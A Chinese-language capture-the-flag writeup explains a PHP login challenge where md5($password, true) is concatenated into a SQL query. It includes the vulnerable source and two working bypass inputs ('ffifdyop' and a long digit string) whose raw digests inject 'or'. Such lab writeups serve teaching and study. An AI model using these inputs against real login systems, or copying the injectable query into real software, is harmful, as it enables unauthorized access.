后台登录 Writeup

题目链接: http://www.shiyanbar.com/ctf/2036

0x00 发现问题

在输入框里面输入1,得到密码错误的回显:

查看源码:

绿色字的部分,发现这是一个经典的php中md5($str,true)注入问题。

0x01 深入分析

1
2
3
4
5
6
7
8
9
$password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
$result=mysqli_query($link,$sql);
if(mysqli_num_rows($result)>0){
echo 'flag is :'.$flag;
}
else{
echo '密码错误!';
}

思路是:通过提交特定的POST参数password,让这段代码执行到 echo 'flag is :'.$flag;。这显然是一个注入问题,问题的关键在于 md5 函数md5($password,true)的第二个参数为 true。

先看php中的md5函数,它有两个参数string和raw。
第一个参数string是必需的,规定要计算的字符串。
第二个参数raw可选,规定十六进制或二进制输出格式:

  • TRUE – 原始 – 16 字符二进制格式
  • FALSE – 默认 – 32 字符十六进制数

示例如下:

1
2
3
4
5
6
<?php
$str = "Shanghai";
echo "字符串:".$str."<br>";
echo "TRUE - 原始 16 字符二进制格式:".md5($str, TRUE)."<br>";
echo "FALSE - 32 字符十六进制格式:".md5($str)."<br>";
?>

输出为:

1
2
3
字符串:Shanghai
TRUE - 原始 16 字符二进制格式:Tf頦+饲X0蠨鎗�)�
FALSE - 32 字符十六进制格式:5466ee572bcbc75830d044e66ab429bc

由上例可知,当md5函数的第二个参数为true时,该函数的输出是原始二进制格式,会被作为字符串处理。
理解这一点后,问题就简单了。
只要提交特定字符串,让其md5值以原始二进制格式输出(被当作字符串)时含有能触发SQL注入的特殊字符即可。

1
2
3
4
content: 129581926211651571912466741651878684928
hex: 06da5430449f8f6f23dfc1276f722738
raw: \x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
string: T0Do#'or'8

1
2
3
4
content: ffifdyop
hex: 276f722736c95d99e921722cf9ed621c
raw: 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string: 'or'6]!r,b

提交 129581926211651571912466741651878684928ffifdyop 都可以达到本文开头的目的。

0x02 夺旗总结

总结:这道题主要学到 php中md5($str,true)注入
php中md5($str,true)注入– 若水斋